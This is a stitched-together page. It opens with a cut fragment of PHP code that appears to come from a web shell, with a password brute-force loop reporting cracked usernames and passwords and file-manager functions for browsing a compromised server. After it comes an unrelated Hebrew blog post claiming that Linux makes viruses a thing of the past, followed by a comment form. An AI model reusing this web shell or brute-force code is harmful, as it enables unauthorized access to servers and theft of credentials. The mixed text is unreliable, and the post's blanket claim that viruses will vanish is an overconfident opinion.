"; sleep(5); } else if ( curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user" and Password "$pass"

"; exit; } else{ if($httpcode===0){ echo "No response
"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("URL=",$cont); $narr = explode('">',$farr[1]); echo "Please change to this host -> ". $narr[0]; exit; } //echo $httpcode; } curl_close($ch); } public function DFSCurrent($slashtype){ echo "
Current folder : "; $truepath = array(); if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $path = $this->DFSDirFilter($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); $path = $this->Dec($path); }else{ $path = getcwd(); } $dfsEP = explode($slashtype,$path); $dfsSZ = sizeof(($dfsEP)); $dfsGE = ""; for($c=0;$c<$dfsSZ;$c++){ array_push($truepath,$dfsEP[$c]); } if($GLOBALS['DFSPlatform']!=='win'){ $endslash = $this->DFSDirFilter($slashtype); echo "$slashtype"; } for($i=0;$iDFSDirFilter($dfsGE); //$this->string = preg_replace('/'.$slashtype.$slashtype.'/i',$slashtype,$dfsGE); echo "$dfsEP[$i]"; echo $slashtype; } } echo "
"; } public function DFSOG($file){ if($GLOBALS['DFSPlatform']!=='win'){ $owner_file = (fileowner($file)?:0); $group_file = (filegroup($file)?:0); $checkposix = $this->DFSDat('ini','disable_functions'); if($checkposix !=="None"){ $checkposix = explode(",",$checkposix); if(!in_array("posix_getpwuid",$checkposix)){ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } }else{ $owner_group = "-:-"; } }else{ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } } }else{ $owner_group = "-:-"; } return $owner_group; } public function DFSPerms($f) { // Special thanks to marijuana shell developer $p = $GLOBALS['DFSyntax'][1]($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000
זמן עדכון: 01/01/1970 00:00

הבלוג מעורר הדים

קוראת כלשהיא שקראה את המאמר שלי פרסמה קישור למאמר בפורום בתפוז.

הפרסום הזה עורר אינספור הדים ממשתמשי חלונות שממש קשה להם לקבל שוירוס אינו הכרח המציאות. הרבה כתבו על זה שמה פתאום, כאשר לינוקס תיהיה נפוצה גם לה יהיו וירוסים וכד' הרי צפיתי את השטויות הללו ולכן כתבתי בתחילת המאמר שלינוקס כבר כיום נפוצה. בעיקר בשרתים.

כמובן שבתגובות רבות התברר שאנשים מחשיבים כל פריצה למחשב כוירוס. זאת למרות שהדגשתי בתחילת המאמר את ההבדל בין הדברים. לא כל פריצה למחשב היא וירוס. אבל רוב המשתמשים עדיין מתבלבלים בעניין.

אז כשביקשתי דוגמה לוירוס בלינוקס אז או שקיבלתי קישורים למאמרים אינטרסנטיים שלא הראו ולו דוגמה אחת סבירה ובמקרה אחד אפילו כתב מישהו rootkit שזהו כלי לפריצה שאינו כה פשוט לשימוש וברור שלא אוטומטי כמו וירוס.

כמובן שהיו גם לא מעט התקפות אישיות עלי שאני לא מבין דבר וכד' (טוב יכול להיות שלמעלה מעשרים שנה ניסיון לא שוות כלום)

בדרך כלל ברגע שמשהו מגיע להתקפות אישיות זה מאחר שאין משהו ענייני להגיד.

נראה שיש לא מעט משתמשי חלונות מפוחדים, ממש קשה להם לקבל שיש מערכת שעובדת. שהם מנסים בכל דרך אפשרית לתקוף. אז הם תוקפים או את מערכת ההפעלה עליה אני עובד או אותי אישית.

מה יהיה בעתיד? האם יהיו וירוסים? התשובה היא לא, וירוסים יהיו נחלת העבר ברגע שישתמשו במערכות הפעלה כדוגמת לינוקס.

האם לא יהיו פריצות למחשבים? כאן לצערי התשובה היא פחות אופטימית, פריצות למחשבים תמיד יהיו בדיוק כמו שפריצות לבתים יהיו.

על חלק מהדברים מדובר בספר שלי נולדו חופשיים

הוספת תגובה

הוסף תגובה

דואר אלקטרוני: חובה, לא יוצג
אתר אינטרנט:
שלח מייל בתגובה להודעה